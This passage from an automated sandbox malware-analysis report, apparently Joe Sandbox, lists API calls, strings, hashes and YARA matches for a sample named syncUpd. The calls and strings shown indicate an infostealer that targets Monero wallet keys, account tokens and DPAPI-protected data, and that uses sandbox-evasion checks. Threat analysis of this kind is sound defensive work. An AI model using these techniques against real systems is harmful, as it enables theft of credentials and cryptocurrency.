                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Similarity
• API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
• String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
• GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
• HeapAlloc.KERNEL32(00000000), ref: 004142A7
• wsprintfA.USER32 ref: 004142DD
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
Similarity
• API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
• String ID: :$C$\
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00724B88,00000000,?,0041D774,00000000,?,00000000,00000000,?,00724DC8), ref: 0041496D
• HeapAlloc.KERNEL32(00000000), ref: 00414974
• GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
• __aulldiv.LIBCMT ref: 004149AF
• __aulldiv.LIBCMT ref: 004149BD
• wsprintfA.USER32 ref: 004149E9
Similarity
• API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
• String ID: %d MB$@
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
  • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
  • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
• InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
• StrCmpCA.SHLWAPI(?,0071DC68), ref: 00405DE7
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
• InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
• CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
• InternetCloseHandle.WININET(00410E73), ref: 00405EF3
• InternetCloseHandle.WININET(00000000), ref: 00405F00
Similarity
• API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
• String ID:
                                                                                                                                                                                                                                  • API String ID: 2507841554-0
                                                                                                                                                                                                                                  • Opcode ID: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
                                                                                                                                                                                                                                  • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
• GetEnvironmentVariableA.KERNEL32(0071D8C8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
• LoadLibraryA.KERNEL32(00725298,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
  • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0071C6F8,?,0041D8AC,?,00000000), ref: 00416E2B
  • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
  • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
• SetEnvironmentVariableA.KERNEL32(0071D8C8,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
Strings
• PJr, xrefs: 00409AB2
• C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
• xIr, xrefs: 00409A2E
• xPr, xrefs: 00409A63
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
• String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$PJr$xIr$xPr
• API String ID: 2929475105-2642416123
• Opcode ID: 42c24c2bd3098d83908933c1c731d208806978308424b3820254a7636444ccc7
• Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
• Opcode Fuzzy Hash: 42c24c2bd3098d83908933c1c731d208806978308424b3820254a7636444ccc7
• Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
  • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
  • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
  • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
  • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
• lstrlen.KERNEL32(00000000), ref: 0040B44D
  • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
• StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
• lstrlen.KERNEL32(00000000), ref: 0040B553
• lstrlen.KERNEL32(00000000), ref: 0040B567
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
• String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
• API String ID: 2910778473-1079375795
• Opcode ID: bd3649e57599b345671a6428ab154346f8b429091021eed7c3f4e2c3f3a892e6
• Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
• Opcode Fuzzy Hash: bd3649e57599b345671a6428ab154346f8b429091021eed7c3f4e2c3f3a892e6
• Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
Uniqueness
Uniqueness Score: -1.00%
APIs
• GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
• __aulldiv.LIBCMT ref: 00401218
• __aulldiv.LIBCMT ref: 00401226
• ExitProcess.KERNEL32 ref: 00401254
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                  • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                  • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
• HeapAlloc.KERNEL32(00000000), ref: 0040127B
• RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
• RegCloseKey.ADVAPI32(?), ref: 004012BF
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID:
• API String ID: 3466090806-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: :h@$:h@$@:h@
• API String ID: 544645111-3492212131
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
  • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0071FD48,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
  • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
  • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
• lstrlen.KERNEL32(00000000), ref: 0040D0DF
• lstrlen.KERNEL32(00000000), ref: 0040D0F3
• DeleteFileA.KERNEL32(00000000), ref: 0040D16C
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
• String ID:
• API String ID: 211194620-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
  • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
  • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
  • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
  • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
  • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
  • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
  • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
• StrStrA.SHLWAPI(00000000,00724AC8), ref: 0040971B
  • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
  • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
  • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
  • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
• memcmp.MSVCRT ref: 00409774
  • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
  • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
  • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Similarity
• API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
• String ID: $DPAPI
• API String ID: 2647593125-1819349886
                                                                                                                                                                                                                                  • Opcode ID: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
                                                                                                                                                                                                                                  • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1378416451-0
                                                                                                                                                                                                                                  • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                  • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                  • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                                  • Opcode ID: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
                                                                                                                                                                                                                                  • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4203777966-0
                                                                                                                                                                                                                                  • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                  • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1103761159-0
                                                                                                                                                                                                                                  • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                  • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004119C8
                                                                                                                                                                                                                                    • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                    • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411A4D
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: strtok_s$FileFindFirstwsprintf
• String ID:
• API String ID: 3409980764-0
• Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
• Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
• Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
• Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
• ExitProcess.KERNEL32 ref: 0040113E
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: ExitInfoProcessSystem
• String ID:
• API String ID: 752954902-0
• Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
• Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
